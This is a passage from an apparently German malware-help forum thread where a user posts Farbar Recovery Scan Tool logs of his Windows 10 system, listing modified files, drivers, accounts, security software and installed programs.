(x86)\Mozilla Firefox 2017-05-22 17:52 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam 2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini 2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy 2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System 2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew 2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini 2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start 
Menu\Programs\Revo Uninstaller 2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD 2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe 2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll 2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) 
C:\WINDOWS\SysWOW64\RapidFireServer.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\system32\amdvlk64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\system32\amdpcom64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll 2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed 2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages 2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-05-07 18:11 
- 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular 2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017 2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017 2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia 2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO 
steuer Start 2016 2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™ 2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin 2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker 2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung 2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader 2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II 2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net 2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 
____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician 2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod 2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys 2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc 2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24 2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8 2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1 2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung 2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start 
Menu\Programs\Canon Utilities 2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive 2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek 2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared 2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD 2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT 2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache 2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam 2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb 2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap 2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap 2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0 ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg 2017-02-05 19:40 - 2017-02-05 19:40 - 
0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin 2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin 2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin 2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin 2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin 2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin 2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin 2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin 2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin 2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin 2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin 2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin 2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin 2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin 2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl Einige Dateien in TEMP: ==================== 2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-19 15:19
==================== Ende von FRST.txt ============================ |
22.05.2017, 17:39 | #13 |
| Trojan, adware or something else? Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (22-05-2017 18:36:44)
Gestartet von C:\Users\Dino\Desktop
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.)
Hidden Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.) AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft) ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft) Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft) ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.) ASUS GPU Tweak (x32 Version: 